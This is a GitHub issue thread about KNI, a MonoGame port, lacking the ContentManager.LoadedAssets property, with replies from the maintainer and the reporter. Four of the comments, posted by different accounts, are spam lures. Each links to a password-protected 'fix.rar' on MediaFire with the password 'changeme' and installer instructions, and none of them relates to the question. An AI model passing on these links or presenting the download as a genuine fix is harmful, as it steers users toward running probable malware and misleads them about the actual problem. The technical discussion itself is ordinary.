### ISSUE TITLE
Missing MonoGame ContentManager.LoadedAssets property

### ISSUE THREAD

**Issue by dtaylorus** [kniEngine/kni#1797]
I'm trying to port my game from MonoGame and I'm missing the `ContentManager.LoadedAssets` property. I use this property in a custom content manager to support unloading (and reloading) individual assets.

Is there some alternative method for unloading and reloading individual assets in KNI?

Thank you!

#### What version of KNI does the bug occur on:
- KNI 3.13.9001

#### What operating system are you using:
- Windows11

#### What KNI platform are you using:

- BlazorGL

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by nkast** [comment]
loadedAssets is an implementation detail of ContentManager. It's not to be exposed to the end users.

For customizing ContentManager, Shawn Hargreaves had a great article in his blog, 
https://shawnhargreaves.com/blog/contentmanager-readasset.html

**Comment by dtaylorus** [comment]
I implement a custom ContentManager and do in fact unload resources in games built on MonoGame that have been in the App Store and Play Stores for years and are working very well.

Unloading is necessary when changing languages at runtime since all of the localized resources need to be unloaded and reloaded. There is no alternative other than asking the player to force close and restart the game, which I'm not about to do.

But feel free to close this issue if you disagree since I will work around this in my own fork.
